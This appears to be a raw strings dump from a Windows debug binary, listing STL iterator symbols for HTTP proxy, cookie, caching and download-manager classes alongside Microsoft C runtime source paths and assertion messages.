std::_Vector_const_iterator<class std::_Vector_val<char,class std::allocator<char> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,unsigned int,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,unsigned int> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,unsigned int,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,unsigned int> >,1> > >::operator   
std::vector<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > >::operator []
std::_List_const_iterator<class std::_List_val<class RedirectDomainRule *,class std::allocator<class RedirectDomainRule *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class RedirectDomainRule *,class std::allocator<class RedirectDomainRule *> > >::operator   
std::_List_const_iterator<class std::_List_val<class RedirectDomainRule *,class std::allocator<class RedirectDomainRule *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class IProxyWorker *,class IHttpFileDownloadMgr *,struct std::less<class IProxyWorker *>,class std::allocator<struct std::pair<class IProxyWorker * const,class IHttpFileDownloadMgr *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class RequestInfo,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class RequestInfo> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class IProxyWorker *,class IHttpFileDownloadMgr *,struct std::less<class IProxyWorker *>,class std::allocator<struct std::pair<class IProxyWorker * const,class IHttpFileDownloadMgr *> >,0> > >::operator *
std::_List_const_iterator<class std::_List_val<class IHttpProxyWorker *,class std::allocator<class IHttpProxyWorker *> > >::operator   
std::_List_const_iterator<class std::_List_val<class IHttpProxyWorker *,class std::allocator<class IHttpProxyWorker *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class IFileDownloadMgr *,class std::allocator<class IFileDownloadMgr *> > >::operator   
std::_List_const_iterator<class std::_List_val<class IFileDownloadMgr *,class std::allocator<class IFileDownloadMgr *> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class RequestInfo,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class RequestInfo> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class IProxyWorker *,class IHttpFileDownloadMgr *,struct std::less<class IProxyWorker *>,class std::allocator<struct std::pair<class IProxyWorker * const,class IHttpFileDownloadMgr *> >,0> > >::operator   
std::_List_const_iterator<class std::_List_val<class IHttpProxyWorker *,class std::allocator<class IHttpProxyWorker *> > >::operator *
std::_List_const_iterator<class std::_List_val<class IFileDownloadMgr *,class std::allocator<class IFileDownloadMgr *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class RequestInfo,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class RequestInfo> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class IProxyWorker *,class IHttpFileDownloadMgr *,struct std::less<class IProxyWorker *>,class std::allocator<struct std::pair<class IProxyWorker * const,class IHttpFileDownloadMgr *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class RequestInfo,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class RequestInfo> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,1> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,1> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,1> > >::operator   
std::vector<class CachedBuffer,class std::allocator<class CachedBuffer> >::operator []
std::_List_const_iterator<class std::_List_val<class HttpProxyRemote *,class std::allocator<class HttpProxyRemote *> > >::operator   
std::_List_const_iterator<class std::_List_val<class HttpProxyRemote *,class std::allocator<class HttpProxyRemote *> > >::operator ==
std::_List_const_iterator<class std::_List_val<enum FileDownloadMgr::WORKING_THREAD_COMMAND,class std::allocator<enum FileDownloadMgr::WORKING_THREAD_COMMAND> > >::operator   
std::_List_const_iterator<class std::_List_val<enum FileDownloadMgr::WORKING_THREAD_COMMAND,class std::allocator<enum FileDownloadMgr::WORKING_THREAD_COMMAND> > >::operator ==
std::_Deque_const_iterator<class RequestInfo *,class std::allocator<class RequestInfo *> >::operator *
std::_List_const_iterator<class std::_List_val<class HttpProxyRemote *,class std::allocator<class HttpProxyRemote *> > >::operator *
std::_List_const_iterator<class std::_List_val<enum FileDownloadMgr::WORKING_THREAD_COMMAND,class std::allocator<enum FileDownloadMgr::WORKING_THREAD_COMMAND> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class HttpCookie *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class HttpCookie *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::list<class HttpCookie *,class std::allocator<class HttpCookie *> >,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::list<class HttpCookie *,class std::allocator<class HttpCookie *> > > >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::list<class HttpCookie *,class std::allocator<class HttpCookie *> >,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::list<class HttpCookie *,class std::allocator<class HttpCookie *> > > >,0> > >::operator ==
std::_List_const_iterator<class std::_List_val<class HttpCookie *,class std::allocator<class HttpCookie *> > >::operator   
std::_List_const_iterator<class std::_List_val<class HttpCookie *,class std::allocator<class HttpCookie *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class HttpCookie *,class std::allocator<class HttpCookie *> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::list<class HttpCookie *,class std::allocator<class HttpCookie *> >,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::list<class HttpCookie *,class std::allocator<class HttpCookie *> > > >,0> > >::operator   
std::_List_const_iterator<class std::_List_val<class HttpCookie *,class std::allocator<class HttpCookie *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class HttpCookie *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class HttpCookie *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::list<class HttpCookie *,class std::allocator<class HttpCookie *> >,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::list<class HttpCookie *,class std::allocator<class HttpCookie *> > > >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class HttpCookie *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class HttpCookie *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class HttpCookie *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class HttpCookie *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int,class EventImplTable,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class EventImplTable> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int,class EventImplTable,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class EventImplTable> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int,class EventImplTable,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class EventImplTable> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int,class EventImplTable,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class EventImplTable> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<int,class IProxyExtension *,struct std::less<int>,class std::allocator<struct std::pair<int const ,class IProxyExtension *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<int,class IProxyExtension *,struct std::less<int>,class std::allocator<struct std::pair<int const ,class IProxyExtension *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<int,class IProxyExtension *,struct std::less<int>,class std::allocator<struct std::pair<int const ,class IProxyExtension *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<int,class IProxyExtension *,struct std::less<int>,class std::allocator<struct std::pair<int const ,class IProxyExtension *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class CNetworkInterfaceManager::InterfaceInfo *,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class CNetworkInterfaceManager::InterfaceInfo *> >,0> > >::operator ==
std::_List_const_iterator<class std::_List_val<class INetworkInterfaceEvents *,class std::allocator<class INetworkInterfaceEvents *> > >::operator   
std::_List_const_iterator<class std::_List_val<class INetworkInterfaceEvents *,class std::allocator<class INetworkInterfaceEvents *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class INetworkInterfaceEvents *,class std::allocator<class INetworkInterfaceEvents *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class CNetworkInterfaceManager::InterfaceInfo *,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class CNetworkInterfaceManager::InterfaceInfo *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class CNetworkInterfaceManager::InterfaceInfo *,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class CNetworkInterfaceManager::InterfaceInfo *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class CNetworkInterfaceManager::InterfaceInfo *,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class CNetworkInterfaceManager::InterfaceInfo *> >,0> > >::operator   
std::_Deque_const_iterator<enum LightXML::ParseState,class std::allocator<enum LightXML::ParseState> >::operator *
std::_Deque_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator *
std::_List_const_iterator<class std::_List_val<class CHttpCacheData *,class std::allocator<class CHttpCacheData *> > >::operator   
std::_List_const_iterator<class std::_List_val<class CHttpCacheData *,class std::allocator<class CHttpCacheData *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class CHttpCacheData *,class std::allocator<class CHttpCacheData *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<int,class SubjectDataProperty,struct std::less<int>,class std::allocator<struct std::pair<int const ,class SubjectDataProperty> >,0> > >::operator ==
std::_List_const_iterator<class std::_List_val<class SubjectDataProperty,class std::allocator<class SubjectDataProperty> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class IObserver *,class IObserver *,struct std::less<class IObserver *>,class std::allocator<struct std::pair<class IObserver * const,class IObserver *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<int,class SubjectDataProperty,struct std::less<int>,class std::allocator<struct std::pair<int const ,class SubjectDataProperty> >,0> > >::operator *
std::_List_const_iterator<class std::_List_val<class SubjectDataProperty,class std::allocator<class SubjectDataProperty> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class IObserver *,class IObserver *,struct std::less<class IObserver *>,class std::allocator<struct std::pair<class IObserver * const,class IObserver *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<int,class SubjectDataProperty,struct std::less<int>,class std::allocator<struct std::pair<int const ,class SubjectDataProperty> >,0> > >::operator   
std::_List_const_iterator<class std::_List_val<class SubjectDataProperty,class std::allocator<class SubjectDataProperty> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class IObserver *,class IObserver *,struct std::less<class IObserver *>,class std::allocator<struct std::pair<class IObserver * const,class IObserver *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<int,class SubjectDataProperty,struct std::less<int>,class std::allocator<struct std::pair<int const ,class SubjectDataProperty> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class IObserver *,class IObserver *,struct std::less<class IObserver *>,class std::allocator<struct std::pair<class IObserver * const,class IObserver *> >,0> > >::operator --
std::_List_const_iterator<class std::_List_val<class ICacheWorker *,class std::allocator<class ICacheWorker *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class ICacheWorker *,class std::allocator<class ICacheWorker *> > >::operator   
std::_List_const_iterator<class std::_List_val<class ICacheWorker *,class std::allocator<class ICacheWorker *> > >::operator --
std::_List_const_iterator<class std::_List_val<class ICacheWorker *,class std::allocator<class ICacheWorker *> > >::operator *
std::_List_const_iterator<class std::_List_val<class JobInfo *,class std::allocator<class JobInfo *> > >::operator   
std::_List_const_iterator<class std::_List_val<class JobInfo *,class std::allocator<class JobInfo *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class JobInfo *,class std::allocator<class JobInfo *> > >::operator --
std::_List_const_iterator<class std::_List_val<class JobInfo *,class std::allocator<class JobInfo *> > >::operator *
std::_List_const_iterator<class std::_List_val<class CConnectionsManagerSocket *,class std::allocator<class CConnectionsManagerSocket *> > >::operator   
std::_List_const_iterator<class std::_List_val<class CConnectionsManagerSocket *,class std::allocator<class CConnectionsManagerSocket *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class CConnectionsManagerSocket *,class std::allocator<class CConnectionsManagerSocket *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int,class AccelerationData *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class AccelerationData *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int,class AccelerationData *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class AccelerationData *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int const ,unsigned int,struct std::less<unsigned int const >,class std::allocator<struct std::pair<unsigned int const ,unsigned int> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int const ,unsigned int,struct std::less<unsigned int const >,class std::allocator<struct std::pair<unsigned int const ,unsigned int> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int,class AccelerationData *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class AccelerationData *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int const ,unsigned int,struct std::less<unsigned int const >,class std::allocator<struct std::pair<unsigned int const ,unsigned int> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int,class AccelerationData *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class AccelerationData *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int const ,unsigned int,struct std::less<unsigned int const >,class std::allocator<struct std::pair<unsigned int const ,unsigned int> >,0> > >::operator --
f:\dd\vctools\crt_bld\self_x86\crt\src\xstring
f:\dd\vctools\crt_bld\self_x86\crt\src\streambuf
std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator   
std::_String_const_iterator<unsigned short,struct std::char_traits<unsigned short>,class std::allocator<unsigned short> >::operator *
std::_String_const_iterator<unsigned short,struct std::char_traits<unsigned short>,class std::allocator<unsigned short> >::operator   
std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator  =
std::_String_const_iterator<unsigned short,struct std::char_traits<unsigned short>,class std::allocator<unsigned short> >::operator  =
cf:\dd\vctools\crt_bld\self_x86\crt\src\dbgdel.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\sprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
_CrtSetDbgFlag
(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)
_CrtMemCheckpoint
f:\dd\vctools\crt_bld\self_x86\crt\src\printf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c
wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)
wcscpy_s(szExeName, 260, L"<program name unknown>")
__crtMessageWindowW
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.h
("Corrupted pointer passed to _freea", 0)
f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c
mscoree.dll
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcpy.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsrchr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsncmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsncpy.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcat.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strlwr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\feoferr.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\sscanf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\access.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fprintf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fdopen.c
f:\dd\vctools\crt_bld\self_x86\crt\src\memicmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c
f:\dd\vctools\crt_bld\self_x86\crt\src\bsearch.c
f:\dd\vctools\crt_bld\self_x86\crt\src\stat64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbcmp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fgets.c
strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))
.sizeInTChars > 0
f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c
f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strtod.c
f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c
("Invalid MBCS character sequence passed to strftime",0)
("Invalid MBCS character sequence passed into strftime",0)
f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)
wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")
wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")
_NMSG_WRITE
f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp
f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
strcpy_s(szExeName, 260, "<program name unknown>")
__crtMessageWindowA
f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c
f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c
((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))
KERNEL32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c
f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c
wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")
strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportA
strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")
wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
_VCrtDbgReportW
f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c
WUSER32.DLL
f:\dd\vctools\crt_bld\self_x86\crt\src\close.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstok_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\strtoq.c
f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsbtype.c
f:\dd\vctools\crt_bld\self_x86\crt\src\write.c
f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fstat64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\open.c
0 && "Only UTF-16 little endian & UTF-8 is supported for reads"
f:\dd\vctools\crt_bld\self_x86\crt\src\dtoxtm64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbscspn.c
f:\dd\vctools\crt_bld\self_x86\crt\src\fullpath.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c
f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c
f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c
f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbicm.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c
f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c
_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2
f:\dd\vctools\crt_bld\self_x86\crt\src\strtok_s.inl
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c
f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c
strcpy_s(resultstr, resultsize, autofos.man)
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl
f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c
